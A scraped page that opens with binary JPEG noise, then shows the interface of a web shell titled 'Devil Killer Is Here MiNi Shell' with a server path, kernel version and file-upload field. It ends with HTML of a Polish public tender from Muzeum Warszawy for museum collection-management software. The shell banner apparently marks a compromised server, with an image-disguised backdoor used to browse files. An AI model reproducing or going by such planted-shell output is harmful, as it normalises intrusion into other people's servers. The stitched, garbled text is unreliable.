JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240212/0010236301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zakup i wdrożenie systemu do elektronicznej ewidencji i zarządzania zbiorami w ramach projektu Zakupy inwestycyjne dla Muzeum Warszawy – zakup programu do ewidencji zbiorów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Warszawy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 016387044</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek Starego Miasta 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-272</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@muzeumwarszawy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.muzeumwarszawy.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i wdrożenie systemu do elektronicznej ewidencji i zarządzania zbiorami w ramach projektu Zakupy inwestycyjne dla Muzeum Warszawy – zakup programu do ewidencji zbiorów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-97119c63-c9c8-11ee-875e-a22221c84ba7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00102363</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://muzeumwarszawy.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.muzeumwarszawy.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Określone w Rozdziale 11</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MW/ZP/2/TP/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest:<br/>a)<br/>dostawa/zakup Systemu oraz jego dostosowanie do potrzeb Zamawiającego opisanych w niniejszym dokumencie;<br/>b)<br/>instalacja i uruchomienie Systemu do użytku Zamawiającemu w infrastrukturze informatycznej zapewnionej przez Wykonawcę;<br/>c)<br/>wdrożenie Systemu, testy i zasilenie (migracje) testowe wraz z Migracją danych z obecnie wykorzystywanego systemu Musnet Niebieski, pliku formatu csv/xls/xlsx, a także Multimediów z repozytorium Zamawiającego oraz zgromadzonych w systemie Musnet Niebieski;<br/>d)<br/>udzielenie niewyłącznej, nieograniczonej terytorialnie, na okres 50 lat licencji dla Muzeum (bez ograniczenia liczby użytkowników) na wdrożony System i na wszystkie jego aktualizacje zainstalowane w czasie trwania umowy na przedmiotowe zamówienie, w tym zapewnienia udzielenia licencji przez podmioty trzecie jeśli realizacja przedmiotowego zamówienia przez Wykonawcę dla osiągnięcia celu zamówienia, będzie tego wymagała;<br/>e)<br/>szkolenia pracowników;<br/>f)<br/>świadczenie Hostingu przez Wykonawcę na zapewnionej przez niego infrastrukturze informatycznej przez okres 24 miesięcy od dnia podpisania przez strony protokołu odbioru wdrożonego Systemu;<br/>g)<br/>przygotowanie do przeniesienia i przeniesienie Systemu na infrastrukturę Muzeum Warszawy lub inny hosting po okresie zakończenia świadczenia Hostingu;<br/>h)<br/>świadczenie Gwarancji Systemu, niezbędnych zmian, utrzymania Systemu, jakości wsparcia oraz na rozbudowy Systemu, w okresie co najmniej 24 miesięcznym na zasadach wskazanych w Projektowanych Postanowieniach Umowy;<br/>i)<br/>świadczenie Usługi wsparcia przez okres 24 miesięcy od dnia podpisania przez strony protokołu odbioru wdrożonego Systemu;<br/>j)<br/>świadczenie Usług rozwoju i modyfikacji Systemu w celu zapewnienia realizacji przyszłych wymagań Zamawiającego w ramach godzin rozwojowych w wymiarze 150 godzin. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72243000-0 - Usługi programowania</p> <p class="mb-0">72260000-5 - Usługi w zakresie oprogramowania</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <p class="mb-0">72265000-0 - Usługi konfiguracji oprogramowania</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość udzielenia prawa opcji polegających na<br/>świadczeniu usług rozwoju i modyfikacji Systemu w wymiarze do 320 godzin, o ile będzie posiadał odpowiednie środki finansowe. Wykonawcy nie przysługują żadne roszczenia odszkodowawcze z tytułu nie wykorzystania z części lub całości godzin objętych prawem opcji. Dalsze przesłanki skorzystania z opcji oraz sposób i zasady świadczenia usług objętych tym prawem wskazane są w Projektowanych Postanowieniach Umowy. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zespołu skierowanego do realizacji zamówienia (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej<br/>Wykonawca spełni warunek, jeżeli wykaże, w zakresie doświadczenia, że:<br/>1.1.1. w okresie ostatnich 3 lat przed upływem terminu składania ofert, samodzielnie wykonał należycie co najmniej dwie usługi, z których każda polegała co najmniej na dostawie i wdrożeniu informatycznego systemu do ewidencji i zarządzania zbiorami muzeum (obsługi procedur muzealnych np. akcesja, wypożyczenie, itp.) do instytucji kultury w rozumieniu ustawy z dnia 25 października 1991 r. o organizowaniu i prowadzeniu działalności kulturalnej (t.j. Dz. U. z 2020 r. poz. 194 z późn. zm):<br/>1.1.1.1. obsługującego bazę zbiorów muzealnych danych zawierającą nie mniej niż 200 000 rekordów (poprzez rekord należy rozumieć pojedynczy obiekt wpisany do inwentarza muzealnego w jednej instytucji),<br/>1.1.1.2. w każdej instytucji umożliwiający jednoczesną pracę w systemie bez określania limitów użytkowników,<br/>1.1.1.3. o wartości co najmniej 280 000,00 PLN netto każdej z usług.<br/>1.1.2. w okresie ostatnich 3 lat przed upływem terminu składania ofert, wykonał co najmniej jedną usługę dla instytucji kultury w rozumieniu ustawy z dnia 25 października 1991 r. o organizowaniu i prowadzeniu działalności kulturalnej (t.j. Dz. U. z 2020 r. poz. 194 z późn. zm.), których przedmiotem było wykonanie migracji danych z systemu do elektronicznej ewidencji zbiorów Musnet do informatycznego systemu do ewidencji i zarządzania zbiorami muzeum. Usługa polegać musiała na bezstratnej migracji minimum danych dot. obiektów, zmian lokalizacji dla bazy danych zawierającej minimum 100 000 obiektów muzealnych.<br/>1.1.3. w okresie ostatnich 3 lat przed upływem terminu składania ofert, wykonał co najmniej 2 usługi polegające na zaprojektowaniu, dostarczeniu, budowie i wdrożeniu dla instytucji kultury w rozumieniu ustawy z dnia 25 października 1991 r. o organizowaniu i prowadzeniu działalności kulturalnej (t.j. Dz. U. z 2020 r. poz. 194 z późn. zm.) informatycznego systemu do ewidencji i zarządzania zbiorami muzeum, której celem jest przetwarzanie danych dotyczących zbiorów muzealnych o woluminie nie mniejszym niż 10 TB danych w tym zbiorów obiektów binarnych (np. plików graficznych) wraz z wdrożonym mechanizmem bezpiecznej integracji przez otwarte API z platformą internetową, umożliwiającą synchronizację danych.<br/><br/>Wykonawca spełni warunek, jeżeli wykaże, w zakresie doświadczenia, że:<br/>1.1.4. dysponuje co najmniej następującym osobami, które zostaną skierowane przez Wykonawcę do realizacji niniejszego zamówienia, w szczególności odpowiedzialnych za wdrożenie informatycznego systemu do ewidencji i zarządzania zbiorami muzeum:<br/>1.1.4.1. Kierownik/Kierowniczka Projektu – 1 osoba posiadająca:<br/>- wykształcenie wyższe;<br/>- wiedza z zakresu zarządzania projektami;<br/>- wiedza w zakresie zarządzania usługami utrzymaniowymi utworzonego oprogramowania, potwierdzona certyfikatem: ITIL 3 Foundation lub wyższym,<br/>- Co najmniej 5 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika projektów lub równoważnej dla projektów informatycznych,<br/>- posiadającej co najmniej następujące doświadczenie:<br/>w ciągu ostatnich 3 lat przed upływem terminu składania ofert, przez nieprzerwany okres co najmniej 6 miesięcy, pełniła funkcję osoby koordynującej/kierującej projektem, tj. koordynującej pracę całego zespołu w projekcie, w co najmniej 2 zakończonych zamówieniach/projektach, polegających na dostarczeniu i wdrożeniu systemu informatycznego przeznaczonego do ewidencji zbiorów muzealnych oraz zarządzania zbiorami muzealnymi tj. obsługi procedur muzealnych (akcesja, wypożyczenie, itp.), dla instytucji kultury, o wartości nie mniejszej niż 280 000 zł netto każda oraz mających w ciągu ostatnich 3 lat przed upływem terminu składania ofert doświadczenie zdobyte w co najmniej dwóch realizacjach, z których każda polegała na migracji danych ze źródeł zewnętrznych do wdrażanego systemu ewidencji i zarządzania zbiorami muzeum.<br/>1.1.4.2. Kierownik/Kierowniczka Zespołu Programistów – 1 osoba posiadająca<br/>- wykształcenie wyższe;<br/>- doświadczenie: w ciągu ostatnich 3 lat przed upływem terminu składania ofert, przez nieprzerwany okres co najmniej 6 miesięcy pełnił funkcję kierownika zespołu programistów, tj. koordynującej prace zespołu informatycznego, składającego się z programistów backendowych, frontendowych, specjalistów ds. sieci, utrzymania, w co najmniej 2 zakończonych zamówieniach/projektach, polegających na dostarczeniu i wdrożeniu systemu informatycznego, o wartości nie mniejszej niż 280 000 zł netto każda oraz mających w ciągu ostatnich 3 lat przed upływem terminu składania ofert doświadczenie zdobyte w co najmniej dwóch realizacjach, z których każda polegała na migracji danych ze źródeł zewnętrznych do wdrażanego systemu ewidencji i zarządzania zbiorami muzeum.<br/>1.1.4.3. Programista – 2 osoby posiadające:<br/>- wykształcenie wyższe techniczne (ukończony kierunek informatyka lub pokrewny);<br/>- doświadczenie: w ciągu ostatnich 3 lat przed upływem terminu składania ofert, przez nieprzerwany okres co najmniej 6 miesięcy pełniła funkcję Programisty, tj. osoby odpowiedzialnej za właściwe realizowanie funkcjonalności wskazanych w dokumentacji analitycznej w co najmniej 2 zakończonych zamówieniach/projektach, polegających na dostarczeniu i wdrożeniu systemu informatycznego, o wartości nie mniejszej niż 280 000 zł netto każda oraz mających doświadczenie zdobyte w co najmniej dwóch<br/>realizacjach, z których każda polegała na migracji danych ze źródeł zewnętrznych do wdrażanego systemu ewidencji i zarządzania zbiorami muzeum.<br/>1.1.4.4. Kierownik/Kierowniczka Testów – 1 osoba posiadająca:<br/>- wykształcenie wyższe techniczne (ukończony kierunek informatyka lub pokrewny);<br/>- aktualny certyfikat ISTQB Certified Tester Advanced – na poziomie minimum Test Manager lub równoważny;<br/>- doświadczenie: w ciągu ostatnich 3 lat przed upływem terminu składania ofert, przez nieprzerwany okres co najmniej 6 miesięcy pełnił funkcję Kierownika testów, tj. osoby odpowiedzialnej za nadzór nad testowaniem poszczególnych komponentów oprogramowania w co najmniej 2 zakończonych zamówieniach/projektach, polegających na dostarczeniu i wdrożeniu systemu informatycznego przeznaczonego do ewidencji zbiorów muzealnych oraz zarządzania zbiorami muzealnymi tj. obsługi procedur muzealnych (akcesja, wypożyczenie, itp.), dla instytucji kultury, o wartości nie mniejszej niż 280 000 zł netto każda oraz mających w ciągu ostatnich 3 lat przed upływem terminu składania ofert doświadczenie zdobyte w co najmniej dwóch realizacjach, z których każda polegała na migracji danych ze źródeł zewnętrznych do wdrażanego systemu ewidencji i zarządzania zbiorami muzeum.<br/>1.1.4.5. Analityk/Analityczka – 1 osoba posiadająca:<br/>- wykształcenie wyższe techniczne (ukończony kierunek informatyka lub pokrewny);<br/>- doświadczenie: w ciągu ostatnich 3 lat przed upływem terminu składania ofert, przez nieprzerwany okres co najmniej 6 miesięcy pełnił funkcję Analityka, tj. osoby odpowiedzialnej za zbieranie i specyfikację wymagań funkcjonalnych i pozafunkcjonalnych, identyfikowanie założeń i ograniczeń systemowych, opracowywanie modelu danych (zakresu gromadzonych i przetwarzanych danych) wraz z modelem przepływu danych pomiędzy systemami, modelu funkcjonalnego całego systemu składającego się z modelu otoczenia oraz modelu zachowania z wykorzystaniem obiektowych języków modelowania, w co najmniej 2 zakończonych zamówieniach/projektach, polegających na dostarczeniu i wdrożeniu systemu informatycznego przeznaczonego do ewidencji zbiorów muzealnych oraz zarządzania zbiorami muzealnymi tj. obsługi procedur muzealnych (akcesja, wypożyczenie, itp.), dla instytucji kultury, o wartości nie mniejszej niż 280 000 zł netto każda<br/>1.1.4.6. Opiekun/Opiekunka Wsparcia – 1 osoba posiadająca:<br/>- wykształcenie wyższe techniczne (ukończony kierunek informatyka lub pokrewny);<br/>- doświadczenie: w ciągu ostatnich 3 lat przed upływem terminu składania ofert, przez nieprzerwany okres co najmniej 6 miesięcy pełniła funkcję Opiekuna Utrzymania, tj. osoby odpowiedzialnej za nadzór nad utrzymaniem poszczególnych komponentów oprogramowania i koordynowania prac Zespołu Wsparcia Wykonawcy realizującego prace serwisowe, m.in. zarządzanie pracami utrzymaniowymi ze strony Wykonawcy, działania serwisowe - naprawy usterek systemu; rekonfiguracje systemu, niezbędne dla jego poprawnej obsługi i użytkowania, pomoc i doradztwo w zakresie posługiwania się systemu oraz współpracować z osobą wskazaną przez Zamawiającego w co najmniej 2 zakończonych zamówieniach/projektach, polegających na dostarczeniu i wdrożeniu<br/>systemu informatycznego przeznaczonego do ewidencji zbiorów muzealnych oraz zarządzania zbiorami muzealnymi tj. obsługi procedur muzealnych (akcesja, wypożyczenie, itp.), dla instytucji kultury , o wartości nie mniejszej niż 280 000 zł netto każda oraz mających w ciągu ostatnich 3 lat przed upływem terminu składania ofert doświadczenie zdobyte w co najmniej dwóch realizacjach, z których każda polegała na migracji danych ze źródeł zewnętrznych do wdrażanego systemu ewidencji i zarządzania zbiorami muzeum.<br/><br/>d)<br/>sytuacji ekonomicznej i finansowej<br/>Zamawiający ustanawia następujące warunki udziału:<br/>1.<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada zdolność kredytową lub dysponuje środkami finansowymi, w wysokości co najmniej 200.000,00 PLN (słownie: dwieście tysięcy złotych 00/100),<br/>2.<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 400.000,00 zł (słownie: czterysta tysięcy złotych). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> testowej wersja próbki programu w formie linku <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> testowej wersji próbki programu w zakresie spełnienia wymagań określonych w punkcie 10.1 SWZ <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty wymagane jest złożenie<br/>- Wstępnego oświadczenia o spełnienie warunków udziału w postępowaniu i braku podstaw do wykluczenia.<br/>- „WYKAZ OSÓB objętych kryterium oceny ofert (dotyczy spełniania warunków udziału w postępowaniu)” – zgodnie z formularzem II. 3<br/>- „WYKAZ DODATKOWEGO DOŚWIADCZENIA OSÓB podlegających kryterium oceny ofert skierowanych do realizacji zamówienia” – zgodnie z formularzem II.4<br/>- OŚWIADCZENIE dotyczące zakresu wykonywanego zamówienia, zgodnie z art. 117 ust 4 ustawy Pzp, w przypadku składania oferty wspólnej (np. Konsorcjum).<br/>- Zobowiązanie lub inny dokument w przypadku polegania na zasobach podmiotu trzeciego w celu spełnienia warunków udziału w postępowaniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.<br/>Zamawiający przewiduje możliwość dokonania zmian postanowień 